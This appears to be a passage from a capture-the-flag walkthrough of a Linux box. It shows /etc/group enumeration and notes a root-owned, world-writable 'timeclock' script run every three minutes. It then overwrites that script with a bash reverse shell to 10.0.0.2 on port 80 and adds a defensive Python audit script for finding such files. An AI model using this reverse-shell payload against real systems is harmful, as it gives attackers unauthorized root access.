fluffy:x:1003:1003::/home/fluffy:/bin/sh

root:x:0:
daemon:x:1:
bin:x:2:
sys:x:3:
adm:x:4:syslog,pleadformercy
tty:x:5:
disk:x:6:
lp:x:7:
mail:x:8:
news:x:9:
uucp:x:10:
man:x:12:
proxy:x:13:
kmem:x:15:
dialout:x:20:
fax:x:21:
voice:x:22:
cdrom:x:24:pleadformercy
floppy:x:25:
tape:x:26:
sudo:x:27:pleadformercy
audio:x:29:
dip:x:30:pleadformercy
www-data:x:33:
backup:x:34:
operator:x:37:
list:x:38:
irc:x:39:
src:x:40:
gnats:x:41:
shadow:x:42:
utmp:x:43:
video:x:44:
sasl:x:45:
plugdev:x:46:pleadformercy
staff:x:50:
games:x:60:
users:x:100:
nogroup:x:65534:
libuuid:x:101:
netdev:x:102:
crontab:x:103:
syslog:x:104:
landscape:x:105:
fuse:x:106:
mysql:x:107:
kvm:x:108:
messagebus:x:109:
ssl-cert:x:110:postgres
lpadmin:x:111:pleadformercy
scanner:x:112:
sambashare:x:113:pleadformercy
mlocate:x:114:
ssh:x:115:
bind:x:116:
postfix:x:117:
postdrop:x:118:
dovecot:x:119:
dovenull:x:120:
postgres:x:121:
avahi:x:122:
winbindd_priv:x:123:
colord:x:124:
libvirtd:x:125:pleadformercy
tomcat7:x:126:
pleadformercy:x:1000:
qiu:x:1001:
thisisasuperduperlonguser:x:1002:
fluffy:x:1003:




Scheduled Tasks

None.





Interesting Files

  • /var/www/html/time

Has a timestamp that is being updated every three minutes. Possibly there is a script somewhere that I can abuse.

  • /home/fluffy/.private/secrets
ls -l ./.private/secrets

total 20
drwxr-xr-x 2 fluffy fluffy 4096 Nov 20  2018 .
drwxr-xr-x 3 fluffy fluffy 4096 Nov 20  2018 ..
-rwxr-xr-x 1 fluffy fluffy   37 Nov 20  2018 backup.save
-rw-r--r-- 1 fluffy fluffy   12 Nov 20  2018 .secrets
-rwxrwxrwx 1 root   root    222 Nov 20  2018 timeclock




Privilege Escalation

The file /home/fluffy/.private/secrets/timeclock is world-writable. This script is being run every three minutes. I can overwrite the file with a reverse shell payload.

cd /home/fluffy/.private/secrets
echo '#/bin/bash' > timeclock
echo 'bash -i >& /dev/tcp/10.0.0.2/80 0>&1' >> timeclock

Start a listener on TCP 80 and wait for the script to run.
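The condition that made this possible, a root-owned `-rwxrwxrwx` script sitting under directories that every account can traverse, is something an administrator can look for directly. The following is an added audit example, not part of the original post: it walks a directory tree, lists regular files with the others-write bit set, and records the owner and whether every directory on the way down grants search permission to others. Function and field names are made up for this example.

```python
import os
import stat
import sys


def others_can_reach(root, directory):
    """True if every directory from `directory` up to `root` grants search (x) to others."""
    current = directory
    while True:
        if not os.stat(current).st_mode & stat.S_IXOTH:
            return False
        if current == root:
            return True
        current = os.path.dirname(current)


def world_writable_files(root):
    """Return one record per regular file under `root` that any account may rewrite.

    `reachable` only considers directories at or below `root`; the caller is
    expected to start from a directory that unprivileged users can enter.
    """
    root = os.path.abspath(root)
    found = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)  # lstat: judge the entry itself, not a symlink target
            if not stat.S_ISREG(st.st_mode):
                continue
            if not st.st_mode & stat.S_IWOTH:
                continue
            found.append({
                "path": path,
                "uid": st.st_uid,  # uid 0 plus a scheduled job is the case on this box
                "mode": stat.filemode(st.st_mode),
                "reachable": others_can_reach(root, dirpath),
            })
    return found


if __name__ == "__main__":
    start = sys.argv[1] if len(sys.argv) > 1 else "."
    for rec in world_writable_files(start):
        flag = "REACHABLE" if rec["reachable"] else "blocked by directory mode"
        print(f'{rec["mode"]} uid={rec["uid"]} {rec["path"]} ({flag})')
```

Any hit that is reachable, owned by uid 0 and referenced by a cron job or service unit should have its mode tightened to `0755` or stricter.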

root.txt
